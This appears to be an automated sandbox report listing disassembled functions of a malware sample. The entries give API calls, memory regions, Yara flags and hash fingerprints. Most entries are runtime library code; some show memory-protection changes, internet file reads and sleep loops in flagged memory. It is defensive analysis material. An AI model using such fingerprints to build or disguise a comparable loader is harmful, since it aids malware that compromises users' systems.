                                                      Function 0040BE17 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 62COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      • FreeLibrary.KERNEL32(00000000,?,?,?,0040BED8,?,?,0042B000,00000000,?,0040C003,00000004,InitializeCriticalSectionEx,0041EAF4,InitializeCriticalSectionEx,00000000), ref: 0040BEA7
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.2239610616.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000004.00000002.2239610616.000000000042A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_400000_tXEKP1ThBP.jbxd
                                                      Similarity
                                                      • API ID: FreeLibrary
                                                      • String ID: api-ms-
                                                      • API String ID: 3664257935-2084034818
                                                      • Opcode ID: 8c81ecf0019ecd7373f14f2a550921ad389bcfade9b3345979a598c502b3af19
                                                      • Instruction ID: 1d2ba87bd7351691bab4046b775a4f225d6c09ed93031ba1482b23a36008251d
                                                      • Opcode Fuzzy Hash: 8c81ecf0019ecd7373f14f2a550921ad389bcfade9b3345979a598c502b3af19
                                                      • Instruction Fuzzy Hash: 1B11C135A41620ABCB228B68DC45BDA7794EF02760F114632EE05B73C0D778EC058ADD
                                                      Function 0040EF4F Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 30libraryloaderCOMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,0040EF44,?,?,0040EF0C,00000000,771ADF80,?), ref: 0040EF64
                                                      • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 0040EF77
                                                      • FreeLibrary.KERNEL32(00000000,?,?,0040EF44,?,?,0040EF0C,00000000,771ADF80,?), ref: 0040EF9A
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.2239610616.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000004.00000002.2239610616.000000000042A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_400000_tXEKP1ThBP.jbxd
                                                      Similarity
                                                      • API ID: AddressFreeHandleLibraryModuleProc
                                                      • String ID: CorExitProcess$mscoree.dll
                                                      • API String ID: 4061214504-1276376045
                                                      • Opcode ID: 607d73432645c26095c79918e0b94193a9778d3018f0e4e6e685341166a2a245
                                                      • Instruction ID: a9aeb9bb373945a448fb4c2f2a76f55d061337ba3b70deabe2e5838c542f66b1
                                                      • Opcode Fuzzy Hash: 607d73432645c26095c79918e0b94193a9778d3018f0e4e6e685341166a2a245
                                                      • Instruction Fuzzy Hash: E0F0A070A0421AFBCB119B52ED09BDEBF78EF00759F144071F905B21A0CB788E11DB98
                                                      Function 10005FAA Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 30libraryloaderCOMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,10005F5C,?,?,10005F24,?,?,?), ref: 10005FBF
                                                      • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 10005FD2
                                                      • FreeLibrary.KERNEL32(00000000,?,?,10005F5C,?,?,10005F24,?,?,?), ref: 10005FF5
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.2244449840.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000004.00000002.2244427954.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000004.00000002.2244510280.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000004.00000002.2244531740.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_10000000_tXEKP1ThBP.jbxd
                                                      Similarity
                                                      • API ID: AddressFreeHandleLibraryModuleProc
                                                      • String ID: CorExitProcess$mscoree.dll
                                                      • API String ID: 4061214504-1276376045
                                                      • Opcode ID: 72e1e31047de7c6f2cb357695238b525e407410b4f5b93aeb37e18346654144b
                                                      • Instruction ID: ce5d81a5a20928f213bfffb098e7a6005668583a74e8757c7f390ca8b74bdc84
                                                      • Opcode Fuzzy Hash: 72e1e31047de7c6f2cb357695238b525e407410b4f5b93aeb37e18346654144b
                                                      • Instruction Fuzzy Hash: 1BF01C31904129FBEB06DB91CD0ABEE7AB9EB047D6F1041B4F501A21A4CBB5CE41DB90
                                                      Function 1000A5DD Relevance: 7.7, APIs: 5, Instructions: 244COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      • GetCPInfo.KERNEL32(00000000,00000001,?,7FFFFFFF,?,?,1000A899,00000000,00000000,00000000,00000001,?,?,?,?,00000001), ref: 1000A680
                                                      • __alloca_probe_16.LIBCMT ref: 1000A736
                                                      • __alloca_probe_16.LIBCMT ref: 1000A7CC
                                                      • __freea.LIBCMT ref: 1000A837
                                                      • __freea.LIBCMT ref: 1000A843
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.2244449840.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000004.00000002.2244427954.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000004.00000002.2244510280.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000004.00000002.2244531740.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_10000000_tXEKP1ThBP.jbxd
                                                      Similarity
                                                      • API ID: __alloca_probe_16__freea$Info
                                                      • String ID:
                                                      • API String ID: 2330168043-0
                                                      • Opcode ID: 8cc199d558b997503fdcee74a17b35d0cfef9a10842a3a6720ec3a40d10b29e0
                                                      • Instruction ID: 1dd90d70d9504398cfa9d6ef4ea6864651e072268de8b4bf5549d7cf43e308ef
                                                      • Opcode Fuzzy Hash: 8cc199d558b997503fdcee74a17b35d0cfef9a10842a3a6720ec3a40d10b29e0
                                                      • Instruction Fuzzy Hash: C081A472D042569BFF11CE648C81ADE7BF5EF0B6D0F158265E904AB148DB369DC1CBA0
                                                      Function 004136A0 Relevance: 7.7, APIs: 5, Instructions: 199COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • __alloca_probe_16.LIBCMT ref: 00413724
                                                      • __alloca_probe_16.LIBCMT ref: 004137EA
                                                      • __freea.LIBCMT ref: 00413856
                                                        • Part of subcall function 0041249E: RtlAllocateHeap.NTDLL(00000000,?,?,?,0040A15B,?,?,?,004010EC,?,004034A7,?,?,?), ref: 004124D0
                                                      • __freea.LIBCMT ref: 0041385F
                                                      • __freea.LIBCMT ref: 00413882
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.2239610616.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000004.00000002.2239610616.000000000042A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_400000_tXEKP1ThBP.jbxd
                                                      Similarity
                                                      • API ID: __freea$__alloca_probe_16$AllocateHeap
                                                      • String ID:
                                                      • API String ID: 1423051803-0
                                                      • Opcode ID: 108019662ccab921f27eff110a88a80a1d8b3600edd5f6f257505aea3f790572
                                                      • Instruction ID: 356f55c8d52bf468307c9bd9aee3ed648f54657124d7a114e97aef17e3d97ec8
                                                      • Opcode Fuzzy Hash: 108019662ccab921f27eff110a88a80a1d8b3600edd5f6f257505aea3f790572
                                                      • Instruction Fuzzy Hash: 6151D3B2600206ABEF20AF55CC41EEB36E9EF44755F15412EFD18E7290D738DE9186A8
                                                      Function 04CD2AA0 Relevance: 7.7, APIs: 5, Instructions: 199COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000003.1463319406.0000000004CC0000.00000004.00001000.00020000.00000000.sdmp, Offset: 04CC0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_3_4cc0000_tXEKP1ThBP.jbxd
                                                      Similarity
                                                      • API ID: __freea$__alloca_probe_16
                                                      • String ID:
                                                      • API String ID: 3509577899-0
                                                      • Opcode ID: 378295b6f49c7a1482985147ff9c11c2e1bf4f3a81760b0e32bf93aa04d95b4b
                                                      • Instruction ID: 8bf3a028fe260f717d4c16c8f071776cd0e1120df580d7ede964c3cc1b54a44d
                                                      • Opcode Fuzzy Hash: 378295b6f49c7a1482985147ff9c11c2e1bf4f3a81760b0e32bf93aa04d95b4b
                                                      • Instruction Fuzzy Hash: C351B376600206ABFF219F648C80EBB3BABDF84754F1901A9FE0597150E771FD52A6A0
                                                      Function 1000AFB7 Relevance: 7.7, APIs: 5, Instructions: 199COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • __alloca_probe_16.LIBCMT ref: 1000B03B
                                                      • __alloca_probe_16.LIBCMT ref: 1000B101
                                                      • __freea.LIBCMT ref: 1000B16D
                                                        • Part of subcall function 100079EE: RtlAllocateHeap.NTDLL(00000000,10001F83,?,?,10002743,10001F83,?,10001F83,0007A120), ref: 10007A20
                                                      • __freea.LIBCMT ref: 1000B176
                                                      • __freea.LIBCMT ref: 1000B199
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.2244449840.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000004.00000002.2244427954.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000004.00000002.2244510280.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000004.00000002.2244531740.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_10000000_tXEKP1ThBP.jbxd
                                                      Similarity
                                                      • API ID: __freea$__alloca_probe_16$AllocateHeap
                                                      • String ID:
                                                      • API String ID: 1423051803-0
                                                      • Opcode ID: e63f2a8978e00137fdd1d9a780ebd3875915c182c7a46276be8a26015b9944ff
                                                      • Instruction ID: ca0e6193c5ab93552cef367aef9b2c098b98f9a761b18089088d519bce5e91c7
                                                      • Opcode Fuzzy Hash: e63f2a8978e00137fdd1d9a780ebd3875915c182c7a46276be8a26015b9944ff
                                                      • Instruction Fuzzy Hash: 6651C072600616ABFB21CF64CC81EAF37E9EF456D0F624129FD14A7158EB34EC5197A0
                                                      Function 04B12BB7 Relevance: 7.6, APIs: 5, Instructions: 113memorywindowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • VirtualProtect.KERNEL32(?,?,?,?), ref: 04B12C5F
                                                      • GetLastError.KERNEL32(00000400,?,00000000,00000000,?,?,?,?), ref: 04B12C74
                                                      • FormatMessageA.KERNEL32(00001300,00000000,00000000,?,?,?,?), ref: 04B12C82
                                                      • LocalAlloc.KERNEL32(00000040,?,?,?,?,?), ref: 04B12C9D
                                                      • OutputDebugStringA.KERNEL32(00000000,?,?), ref: 04B12CBC
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.2242455877.0000000004B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B10000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_4b10000_tXEKP1ThBP.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: AllocDebugErrorFormatLastLocalMessageOutputProtectStringVirtual
                                                      • String ID:
                                                      • API String ID: 2509773233-0
                                                      • Opcode ID: 98a23b1f51539c79b15504070a912fe8a1d772cf35a21b11453b2abeaae28325
                                                      • Instruction ID: 1fae6cd659133df18cb2962fc1559dbb0152176f131678abc2a25c1cc1219d20
                                                      • Opcode Fuzzy Hash: 98a23b1f51539c79b15504070a912fe8a1d772cf35a21b11453b2abeaae28325
                                                      • Instruction Fuzzy Hash: A9313571B00004AFDB08DF68DC40FBAB768EF48304F5541E9EA05EB261CB31AD52CB94
                                                      Function 10002986 Relevance: 7.6, APIs: 5, Instructions: 87COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.2244449840.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000004.00000002.2244427954.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000004.00000002.2244510280.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000004.00000002.2244531740.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_10000000_tXEKP1ThBP.jbxd
                                                      Similarity
                                                      • API ID: dllmain_raw$dllmain_crt_dispatch
                                                      • String ID:
                                                      • API String ID: 3136044242-0
                                                      • Opcode ID: c90a93295f6bc331d57bb8f47297671563acdadf013a8df03a89f4d1d37c88ce
                                                      • Instruction ID: 86b98bd5048e9daedf5606c3f96c4c2c05ee8e367bee4de8e4e1682ebb6c2564
                                                      • Opcode Fuzzy Hash: c90a93295f6bc331d57bb8f47297671563acdadf013a8df03a89f4d1d37c88ce
                                                      • Instruction Fuzzy Hash: EA21A476E0526AAFFB32CF55CC41ABF3AA9EB85AD0F014115FC4867258CB309D419BD1
                                                      Function 00416FE1 Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      • _free.LIBCMT ref: 00416FF9
                                                        • Part of subcall function 00411AC2: RtlFreeHeap.NTDLL(00000000,00000000,?,00417074,?,00000000,?,?,?,0041709B,?,00000007,?,?,0041737A,?), ref: 00411AD8
                                                        • Part of subcall function 00411AC2: GetLastError.KERNEL32(?,?,00417074,?,00000000,?,?,?,0041709B,?,00000007,?,?,0041737A,?,?), ref: 00411AEA
                                                      • _free.LIBCMT ref: 0041700B
                                                      • _free.LIBCMT ref: 0041701D
                                                      • _free.LIBCMT ref: 0041702F
                                                      • _free.LIBCMT ref: 00417041
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.2239610616.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000004.00000002.2239610616.000000000042A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_400000_tXEKP1ThBP.jbxd
                                                      Similarity
                                                      • API ID: _free$ErrorFreeHeapLast
                                                      • String ID:
                                                      • API String ID: 776569668-0
                                                      • Opcode ID: e9905c8b19ab3d426ab646f49b16c807e4d2b9b7b2a9eaa828597b4964810506
                                                      • Instruction ID: 1bbc7c59558bdb80d40cd5d769ae83ba842cf1fe79b15496f27bd1d3c69b9f62
                                                      • Opcode Fuzzy Hash: e9905c8b19ab3d426ab646f49b16c807e4d2b9b7b2a9eaa828597b4964810506
                                                      • Instruction Fuzzy Hash: 2AF04432705240678534DB5DE486D967BE9AF44760758481BF508D7A12D73CFCD0465C
                                                      Function 04CD63E1 Relevance: 7.5, APIs: 5, Instructions: 40COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000003.1463319406.0000000004CC0000.00000004.00001000.00020000.00000000.sdmp, Offset: 04CC0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_3_4cc0000_tXEKP1ThBP.jbxd
                                                      Similarity
                                                      • API ID: _free
                                                      • String ID:
                                                      • API String ID: 269201875-0
                                                      • Opcode ID: 66f692938bcf18abe0cb3e5c7653619a9fabf3dc7bd25fd00b9023d19967cfd6
                                                      • Instruction ID: fc27c78e69d40f107206c8ea946612b2415942d655eeceeaadc02af4b6de8ee0
                                                      • Opcode Fuzzy Hash: 66f692938bcf18abe0cb3e5c7653619a9fabf3dc7bd25fd00b9023d19967cfd6
                                                      • Instruction Fuzzy Hash: 9EF09672701200A78634DF5DF886C2773DBAB00724FA88C1DF648D7902CB75F991C669
                                                      Function 1000C51E Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      • _free.LIBCMT ref: 1000C536
                                                        • Part of subcall function 10007A3C: RtlFreeHeap.NTDLL(00000000,00000000,?,100066F0), ref: 10007A52
                                                        • Part of subcall function 10007A3C: GetLastError.KERNEL32(?,?,100066F0), ref: 10007A64
                                                      • _free.LIBCMT ref: 1000C548
                                                      • _free.LIBCMT ref: 1000C55A
                                                      • _free.LIBCMT ref: 1000C56C
                                                      • _free.LIBCMT ref: 1000C57E
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.2244449840.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000004.00000002.2244427954.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000004.00000002.2244510280.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000004.00000002.2244531740.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_10000000_tXEKP1ThBP.jbxd
                                                      Similarity
                                                      • API ID: _free$ErrorFreeHeapLast
                                                      • String ID:
                                                      • API String ID: 776569668-0
                                                      • Opcode ID: 5af9cd1d934eff50961f68469d6981d65bd4349cdb7ac1437da5aad4e87a5e75
                                                      • Instruction ID: 9141c028a1f6e8267eca5b553c4c44ea57822cd8596d4ab818939ac7a44c1903
                                                      • Opcode Fuzzy Hash: 5af9cd1d934eff50961f68469d6981d65bd4349cdb7ac1437da5aad4e87a5e75
                                                      • Instruction Fuzzy Hash: BEF0E739A046289BE650DB68ECC2C1A73D9FB456E17608805F448E7699CB34FFC08AA4
                                                      Function 04B27248 Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      • _free.LIBCMT ref: 04B27260
                                                        • Part of subcall function 04B21D29: HeapFree.KERNEL32(00000000,00000000,?,04B272DB,?,00000000,?,?,?,04B27302,?,00000007,?,?,04B275E1,?), ref: 04B21D3F
                                                        • Part of subcall function 04B21D29: GetLastError.KERNEL32(?,?,04B272DB,?,00000000,?,?,?,04B27302,?,00000007,?,?,04B275E1,?,?), ref: 04B21D51
                                                      • _free.LIBCMT ref: 04B27272
                                                      • _free.LIBCMT ref: 04B27284
                                                      • _free.LIBCMT ref: 04B27296
                                                      • _free.LIBCMT ref: 04B272A8
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.2242455877.0000000004B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B10000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_4b10000_tXEKP1ThBP.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: _free$ErrorFreeHeapLast
                                                      • String ID:
                                                      • API String ID: 776569668-0
                                                      • Opcode ID: 66f692938bcf18abe0cb3e5c7653619a9fabf3dc7bd25fd00b9023d19967cfd6
                                                      • Instruction ID: 8eac01ab481a830be5a862c504612aaf15b9b1d8ce2f89d92f4cc56727961648
                                                      • Opcode Fuzzy Hash: 66f692938bcf18abe0cb3e5c7653619a9fabf3dc7bd25fd00b9023d19967cfd6
                                                      • Instruction Fuzzy Hash: D0F04F32614234EB8A34EF68FA86C2673EDEB01760BA41885F45CD7501CA24FC914A68
                                                      Function 04B158D0 Relevance: 7.5, APIs: 1, Strings: 3, Instructions: 476COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.2242455877.0000000004B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B10000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_4b10000_tXEKP1ThBP.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: O*$rB$rB
                                                      • API String ID: 0-546290271
                                                      • Opcode ID: f523bc33ae5dcf39d7c7f9cffc68d396c9ac6c1ced86010178b4c982eee15dc0
                                                      • Instruction ID: adbe764faa2d98d32c9fc9d99d8382338192213c55910659401f2991569e73cf
                                                      • Opcode Fuzzy Hash: f523bc33ae5dcf39d7c7f9cffc68d396c9ac6c1ced86010178b4c982eee15dc0
                                                      • Instruction Fuzzy Hash: 4012D471D002489BEB19EBB8DC50BEDB774AF54308F9081E8D445B71A1EF34BA49CBA1
                                                      Function 04B1516B Relevance: 7.4, APIs: 3, Strings: 1, Instructions: 383sleepCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 04B193D7: RtlEnterCriticalSection.NTDLL(0042AF64), ref: 04B193E2
                                                        • Part of subcall function 04B193D7: RtlLeaveCriticalSection.NTDLL(0042AF64), ref: 04B1941F
                                                      • __Init_thread_footer.LIBCMT ref: 04B151B2
                                                        • Part of subcall function 04B1938D: RtlEnterCriticalSection.NTDLL(0042AF64), ref: 04B19397
                                                        • Part of subcall function 04B1938D: RtlLeaveCriticalSection.NTDLL(0042AF64), ref: 04B193CA
                                                      • Sleep.KERNEL32(000007D0), ref: 04B1552A
                                                      • Sleep.KERNEL32(000007D0), ref: 04B15544
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.2242455877.0000000004B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B10000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_4b10000_tXEKP1ThBP.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: CriticalSection$EnterLeaveSleep$Init_thread_footer
                                                      • String ID: updateSW
                                                      • API String ID: 500923978-2484434887
                                                      • Opcode ID: a48b40eb8ce9b0f2e770e20945fe188cfd2cc4dc723a840eb928d6538466b87f
                                                      • Instruction ID: 563cf4c21d214826776fefd9d09ab0e42732a8f821bb476abdbadf7484e9f6c5
                                                      • Opcode Fuzzy Hash: a48b40eb8ce9b0f2e770e20945fe188cfd2cc4dc723a840eb928d6538466b87f
                                                      • Instruction Fuzzy Hash: 58D1E971A001549BEB38DF28CC9879DB7B1EF81304F9441E9D809AB2A5D775AEC0CF81
                                                      Function 10007CBA Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 206COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.2244449840.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000004.00000002.2244427954.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000004.00000002.2244510280.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000004.00000002.2244531740.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_10000000_tXEKP1ThBP.jbxd
                                                      Similarity
                                                      • API ID: _free
                                                      • String ID: *?
                                                      • API String ID: 269201875-2564092906
                                                      • Opcode ID: 5cf7f851aaec087829ec43eeaab6f60b67ed4c75ee81a41c35adb74eb9a8a420
                                                      • Instruction ID: 7b94f7270babd41a129a228fbe6cecbdc5f775369f8c1ab1d48f9322781d5c4e
                                                      • Opcode Fuzzy Hash: 5cf7f851aaec087829ec43eeaab6f60b67ed4c75ee81a41c35adb74eb9a8a420
                                                      • Instruction Fuzzy Hash: 0C614175D0021A9FEB14CFA9C8815EDFBF5FF48390B2581AAE809F7344D675AE418B90
                                                      Function 10004F12 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 27libraryCOMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,10004EC3,00000000,?,00000001,?,?,?,10004FB2,00000001,FlsFree,10011CC0,FlsFree), ref: 10004F1F
                                                      • GetLastError.KERNEL32(?,10004EC3,00000000,?,00000001,?,?,?,10004FB2,00000001,FlsFree,10011CC0,FlsFree,00000000,?,10003ECF), ref: 10004F29
                                                      • LoadLibraryExW.KERNEL32(00000000,00000000,00000000), ref: 10004F51
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.2244449840.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000004.00000002.2244427954.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000004.00000002.2244510280.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000004.00000002.2244531740.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_10000000_tXEKP1ThBP.jbxd
                                                      Similarity
                                                      • API ID: LibraryLoad$ErrorLast
                                                      • String ID: api-ms-
                                                      • API String ID: 3177248105-2084034818
                                                      • Opcode ID: 194d23d78a7530926df8253abc19602fce8fc6649c780d967afcd7dccf04e9f6
                                                      • Instruction ID: 9caaa85424732638a533447db036373c94518d46a1d9f65793ecca3e1a8de25d
                                                      • Opcode Fuzzy Hash: 194d23d78a7530926df8253abc19602fce8fc6649c780d967afcd7dccf04e9f6
                                                      • Instruction Fuzzy Hash: 19E01274644245B6FB155B60DC45F993B95DB047D0F118030FA0CA80E5DBB1E99599C9
                                                      Function 00412822 Relevance: 6.3, APIs: 4, Instructions: 320COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.2239610616.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000004.00000002.2239610616.000000000042A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_400000_tXEKP1ThBP.jbxd
                                                      Similarity
                                                      • API ID: _strrchr
                                                      • String ID:
                                                      • API String ID: 3213747228-0
                                                      • Opcode ID: ea5dc4856b585dd579de17702f7f9642f7d44acf4acc8e31691820c31d006a79
                                                      • Instruction ID: 6012ccbf35aa319517377e765832e55e269021952583a9b626e33c473f35baf7
                                                      • Opcode Fuzzy Hash: ea5dc4856b585dd579de17702f7f9642f7d44acf4acc8e31691820c31d006a79
                                                      • Instruction Fuzzy Hash: A6B13571A002459FDB25CF68CA817EEBBE1EF55340F14816BD845EB341D2BC9992CB68
                                                      Function 04CD1C22 Relevance: 6.3, APIs: 4, Instructions: 320COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000003.1463319406.0000000004CC0000.00000004.00001000.00020000.00000000.sdmp, Offset: 04CC0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_3_4cc0000_tXEKP1ThBP.jbxd
                                                      Similarity
                                                      • API ID: _strrchr
                                                      • String ID:
                                                      • API String ID: 3213747228-0
                                                      • Opcode ID: 00bd01e052c6ca4725e3dc98c9fc8d994eb0987dbdd7d2e2c545ffa9104eb7c9
                                                      • Instruction ID: 7d98a955ce5d74e608753f6216dfd308c9f12c2dee520366b7b44e9fdf7c9807
                                                      • Opcode Fuzzy Hash: 00bd01e052c6ca4725e3dc98c9fc8d994eb0987dbdd7d2e2c545ffa9104eb7c9
                                                      • Instruction Fuzzy Hash: 38B12872A002859FEB15CF68C8807EEBBF7EF45350F1C456ADA559B241DF34AA42CB60
                                                      Function 04B22A89 Relevance: 6.3, APIs: 4, Instructions: 320COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.2242455877.0000000004B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B10000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_4b10000_tXEKP1ThBP.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: _strrchr
                                                      • String ID:
                                                      • API String ID: 3213747228-0
                                                      • Opcode ID: 00bd01e052c6ca4725e3dc98c9fc8d994eb0987dbdd7d2e2c545ffa9104eb7c9
                                                      • Instruction ID: 9274c33df80dc1e2e28a17206f3cbdc7db6aacfcb936cc08126d4bd0adac61ab
                                                      • Opcode Fuzzy Hash: 00bd01e052c6ca4725e3dc98c9fc8d994eb0987dbdd7d2e2c545ffa9104eb7c9
                                                      • Instruction Fuzzy Hash: 9AB12731A042A69FEB19CF28CA81BBEBBE5EF45350F1445E9D859DB240D634B902CB61
                                                      Function 04B11AE7 Relevance: 6.3, APIs: 4, Instructions: 298networkfileCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • InternetSetFilePointer.WININET(?,00000000,00000000,00000000,00000000), ref: 04B11B6C
                                                      • InternetReadFile.WININET(?,00000000,000003E8,00000000), ref: 04B11B8B
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.2242455877.0000000004B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B10000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_4b10000_tXEKP1ThBP.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: FileInternet$PointerRead
                                                      • String ID:
                                                      • API String ID: 3197321146-0
